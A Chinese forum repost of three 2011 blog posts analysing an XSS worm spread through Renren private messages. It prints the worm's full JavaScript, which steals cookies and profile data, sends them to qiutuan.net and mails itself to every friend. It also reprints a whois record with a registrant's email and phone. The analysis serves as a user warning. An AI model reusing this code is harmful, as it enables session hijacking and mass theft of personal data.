登录
  • #老生常谈

转三‌‌‍‍‌‍‌‌‌‌‍‍‌‍‌‍‍‌‍‍‍‌‌‍‌‍‍‍‍‍‍‍篇关于人人站内信漏洞的技术博客

zach
7128
16
总结:校内站内信漏洞被黑客利用,跨站脚本被执行,用户的资料和cookie已经被黑客窃取。这个漏洞还没有被补上,所以请大家不要打开任何站内信,以免中招。这封暗恋站内信不是病毒,所以大家也就不需要查毒了。但是不排除之后站内信包含病毒的可能性。用生日、手机号、qq号做密码的,建议立刻去改密码。邮箱可能会被卖给垃圾邮件发送者,所以请做好收垃圾邮件的心理准备。如果你上别的论坛神马的,也最好退出重新登陆下或者改下密码。(请懂行的筒子来说一声,cookie被盗如果我在这里退出登录,有用么?没用的吧,还是得改密码?)btw. 校内山寨脸书的铁证也曝光了,哈哈

第一篇:

关于4月29号 人人站内信漏洞造成的资料泄露事件nopl.us

Posted on 星期五, 四月 29th, 2011 at 16:43今天收到三份主题为<有人暗恋你哦,你想知道TA是谁么> 的站内信,开始以为是游戏应用的推广方式,但是打开后发现有问题

查看站内信网页源码,发现其中有一行代码通过利用人人网的代码解析方式, 将本不该在文本中执行的代码执行了.人人网对站内信的内容过滤只在客户端,而不是在服务端,这个病毒直接post站内信从而绕过了内容过滤,这样造成了代码的执行分析代码后发现其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,以及cookie然后通过通讯录功能,还可以得到所有好友名片中的上述信息其后全部信息被发送到制作人的网站上.这次病毒主要是盗取用户的资料,但是这个漏洞完全可以实行漏洞攻击,和木马攻击.这份站内信已经大量传播.————————————————————————关于这些被泄露出去的资料的利用方法比较常用的是卖给别人, 用来做精准广告, 或者骗子做精准骗术.黑客用来套你的密码,很多人的密码都是生日,手机什么的.另外里面还带了你电脑上的cookie,有这个cookie,他就可以在你曾经登录过的网站伪装是你.

————————————————————————–人人网现在的措施是将跨站域名设为敏感词,刚刚测试了一下,这个漏洞依然存在, 而且因为这个漏洞的利用方式是完全公开的, 这段时间利用这个漏洞的攻击的事件会越来越多.光靠关键词没办法控制啊.3点半左右, 人人网开始清理站内信. 这一波攻击到此告一段落了.—————————————————————————再一次的无语, 控诉一下人人, 黑客调用的megaboxx.submit_prehook这个函数来自于forum.developers.facebook.net . 为什么人人的源代码里面会有只出现在facebook里的函数???人人山寨的功夫真是无敌了.另外黑客调用的函数平时发站内信的时候不会用到, 但是为什么黑客会知道?—————————————————————————-

—————————————————————————刚刚查到的域名的注册信息dasha, wang dasha811@gmail.com

hubeishengwuhanshi

wuhan, 518089

China

+1.18603051234 Fax –一个叫王大傻的人, 湖北武汉人. 但是邮编显示这个人是深圳的.————————————————————————服务器现在大量接收数据中,造成了ddos. 可以想象得到他收到了多少资料下面是他的代码(略,代码分析见下一篇)————————————————————————————————————————第二篇:

校内站内信刚刚的攻击中,大家的个人信息可能被泄漏fengchenzi.cn

分类:互联网络作者:风舞清扬阅读:485 views



//最简单的应急办法就是在本地hosts里将qiutuan.net解析到127.0.0.1//C:\Windows\System32\drivers\etc\hosts 或 /etc/hosts 里添加 127.0.0.1 qiutuan.net //简单一点,就是这个叫王大傻(音)的混蛋获取了大家的ID、学校、生日、姓名、QQ、MSN、手机 和 cookie//和大家好友的相关信息,并自动发给好友,还从已发站内信里清除了痕迹//每个打开站内信的同学都会向quituan.net发送数百条信息,王大傻自寻DDoS攻击,目前服务器已瘫痪,但之前已获取到的信息应该被保存了

以下是代码分析:

var token = XN.get_check;

var mobile_friends = [];[/p]var all_friends = [];[/p]

var my_id = 0;

//将指定的数据发送回qiutuan.net予以记录

function send_data(v){var img = document.createElement(‘img’);img.src = ‘qiutuan.net’ + v;document.body.appendChild(img);document.body.removeChild(img);}

//向所有好友发送站内信function send_to_friends(){var i;var idlist = [];[/p]for (i = 0; i < all_friends.length; i++){idlist.push(all_friends.toString());//每获取10个好友,群发1次站内信if (idlist.length == 10){_send_to_friends(idlist);idlist = [];[/p]}}//向零头的几个好友发送//居然一个都不舍得放过if (idlist.length > 0) _send_to_friends(idlist);}

//向指定ID列表内的好友发送“暗恋”的站内信//我猜,2:17秒就是脚本完成全部操作的时间上限function _send_to_friends(ids){var content = “相信每个女生心底都有一只小猫,有的妩媚,有的狂野,有的多愁善感,有的古灵精怪……你心底的那只蠢蠢欲动的小猫,是什么样子的呢?(视频亮点在2:17秒) <script src=’qiutuan.net’></script><embed src=’player.youku.com’ quality=’high’ width=’480′ height=’400′ align=’middle’ allowScriptAccess=’sameDomain’ type=’application/x-shockwave-flash’></embed> “;var p = {action:”sharetofriend”,body:content,form:{albumid:”0″,currenUserTinyurl:””,fromSharedId:”0″,fromShareOwner:”0″,fromname:”",fromno:”0″,fromuniv:”",link:”edm.renren.com;t=51″,pic:””,summary:”相信每个女生心底都有一只小猫,有的妩媚,有的狂野,有的多愁善感,有的古灵精怪……你心底的那只蠢蠢欲动的小猫,是什么样子的呢?”,title:”加a02好友 奖品散不停”,type:”51″},ids:ids,noteId:”0″,subject:”有人暗恋你哦,你想知道TA是谁么”,tsc:token};

delete p.tsc;

new XN.net.xmlhttp({url:”share.renren.com”,data:”tsc=”+token+”&post=”+encodeURIComponent(XN.json.build(p)),onSuccess: function (response) {del_send_messages();}});}

//居然还有扫尾工作//对已发送列表里的站内信进行删除function del_messages(idlist){

var struct_msgs ={action:”delete”,folder:”1″,slice:”20″,unread_count:”0″,ids:idlist};

new Ajax.Request(“/message/ajax.do”,{method:”get”,parameters:”post=”+encodeURIComponent(XN.JSON.build(struct_msgs))});

}

//从已发站内信中删除function del_send_messages(){var xmlhttp;var xmlhttp2;var token;if (window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject(“Microsoft.XMLHTTP”);}xmlhttp.onreadystatechange=function(){

if (xmlhttp.readyState==4 && xmlhttp.status==200){var text = xmlhttp.responseText;/////////////////////////////////////////////////////////////////////////////////////////////////////////////var listid1 = text.match(/thread_(\d+)/g);

for(var i=0;i < listid1.length;i++){

listid1 = listid1.substring(7);

}del_messages(listid1);

/////////////////////////////////////////////////////////////////////////////////////////////////////////////}}xmlhttp.open(“GET”, “msg.renren.com″ ,true);xmlhttp.send();}

//前面的是玩笑,可以一笑而过//这里可就有点不地道了//获取个人信息,包括ID、学校、生日、姓名、QQ、MSN、手机//并发送给qiutuan.net记录function get_self_info(){new XN.net.xmlhttp({url:”renren.com;undefined”,method:”GET”,onSuccess:function(r){

var text_html = r.responseText;

var id,name,birthday,qq,school,mobile,msn,day,month,year;

id = /getalbumprofile\.do\?owner\=(\d+)/.exec(text_html)[1];my_id = id;school = /pf_spread\’\>(.*?)\<\/a\>/.exec(text_html)[1];year = /birt\”\,\”year\”\:\”(\d+)/.exec(text_html)[1];month = /birt\”\,\”month\”\:\”(\d+)/.exec(text_html)[1];day = /birt\”\,\”day\”\:\”(\d+)/.exec(text_html)[1];name = /alt\=\”([^\"]+)的大头贴/.exec(text_html)[1];

if(month <= 9){month = “0″+month;}if(day <= 9){day = “0″+day;}birthday = year + month + day;

qq = /QQ.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

msn = /MSN.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

mobile = /手机号.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

var data = “type=self_info&id=” + id + “&name=” + encodeURIComponent(name)+ “&school=” + encodeURIComponent(school)+ “&birth=” + birthday+ “&qq=” + qq+ “&msn=” + encodeURIComponent(msn)+ “&mobile=” + mobile;send_data(data);}

});}

//获取指定TID好友的信息并发回qiutuan.net以记录function get_card(tid){new XN.net.xmlhttp({url:’renren.com’+tid,method:’get’,onSuccess:function(r){var obj = eval(“(“+r.responseText+”)”);var data = ‘type=card&my_id=’ + my_id+ ‘&id=’ + obj.id+ ‘&name=’ + encodeURIComponent(obj.name)+ ‘&msn=’ + encodeURIComponent(obj.msn)+ ‘&phone=’ + encodeURIComponent(obj.phone)+ ‘&qq=’ + encodeURIComponent(obj.qq)+ ‘&email=’ + encodeURIComponent(obj.email)+ ‘&address=’ + encodeURIComponent(obj.address);send_data(data);}});}

//获取所有好友的信息function get_all_friends(){new XN.net.xmlhttp({url:”renren.com”,method:”GET”,onSuccess:function(r){

var text_html = r.responseText;//alert(text_html);

var friends_list = eval(“(“+text_html+”)”);var owned_mobile = (friends_list.list[0].list).length; //have mobile friends numberfor(var i =0;i< owned_mobile ;i++){mobile_friends.push(friends_list.list[0].list.id);all_friends.push(friends_list.list[0].list.id);}//alert(mobile_friends.length);

var no_mobile = (friends_list.list[1].list).length;for(var i =0;i< no_mobile ;i++){all_friends.push(friends_list.list[1].list.id);}//alert(all_friends.length);for(var i = 0; i < mobile_friends.length; i++)get_card(mobile_friends);send_to_friends();}});}

//这是获取cookie并发送,这个玩得更大了//徐老师提示,如果大家关得快的话,可能还没来得及发出window.onload = function(){send_data(‘type=cookie&v=’+encodeURIComponent(document.cookie));get_self_info();get_all_friends();}

———————————————————————————————————————————-以下是朋友获取到的qiutuan.net的域名信息

[whois.godaddy.com] The data contained in GoDaddy.com, Inc.’s WhoIs database,

while believed by the company to be reliable, is provided “as is”

with no guarantee or warranties regarding its accuracy. This

information is provided for the sole purpose of assisting you

in obtaining information about domain name registration records.

Any use of this data for any other purpose is expressly forbidden without the prior written

permission of GoDaddy.com, Inc. By submitting an inquiry,

you agree to these terms of usage and limitations of warranty. In particular,

you agree not to use this data to allow, enable, or otherwise make possible,

dissemination or collection of this data, in part or in its entirety, for any

purpose, such as the transmission of unsolicited advertising and

and solicitations of any kind, including spam. You further agree

not to use this data to enable high volume, automated or robotic electronic

processes designed to collect or compile this data for any purpose,

including mining this data for your own personal or commercial purposes.Please note: the registrant of the domain name is specified

in the “registrant” field. In most cases, GoDaddy.com, Inc.

is not the registrant of domain names listed in this database.Registrant:

wang dasha

hubeishengwuhanshi

wuhan, 518089

ChinaRegistered through: GoDaddy.com, Inc. (godaddy.com)

Domain Name: QIUTUAN.NET

Created on: 06-Mar-11

Expires on: 06-Mar-13

Last Updated on: 12-Apr-11

Administrative Contact:

dasha, wang dasha811@gmail.com

hubeishengwuhanshi//注册人王大傻(音)为武汉的

wuhan, 518089

China

+1.18603051234 Fax –Technical Contact:

dasha, wang dasha811@gmail.com

hubeishengwuhanshi

wuhan, 518089

China

+1.18603051234 Fax –Domain servers in listed order:

NS1.HOSTABLE.COM

NS2.HOSTABLE.COM

NS69.DOMAINCONTROL.COM

NS70.DOMAINCONTROL.COM这人可以去死了。一堆假地址!主机地址在washington DC.——————————————————————————————————————

第三篇:internet.solidot.org

"4月29日晚,大量人人网用户收到一个标题为《有人暗恋你哦,你想知道TA是谁么》的站内信,用户发现若打开此站内信将会自动将此站内信内容发给所有好友。通过查看站内信网页源码,发现其中有一行代码为<script src='http://qiutuan.net/2011/51.js'>。显然,一个稍微有点网站编程常识的人都知道“<>”一类标签符号在显示的时候需要转义为普通文本防止浏览器执行,但人人网的转化方式为在用户发送端转化,若绕过此机制直接发送(如此js脚本中直接post站内信内容)则文本中包含的HTML均可被正常执行……

显然作者的意图并非只是恶作剧,通过查看连混淆都懒得做的代码,我们可以很清楚的看到其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,并且通过一个伟大的功能——通讯录,还可以得到所有好友名片中的上述信息……全部信息会发送到qiutuan.net

由于此站内信的传播之广泛,目前只知道此域名几乎是针对性的使用并且托管在美国,唯一能稍微解决此问题的方法是所有会写代码的人都写一个脚本随机生成数据去稀释被上传的数据,当然要在其收手前做完。 "

要知道,人人网的隐私保护做的一直没有山寨它的某网站好。

珍爱生命,远离淫淫。

16条回复
热度排序

发表回复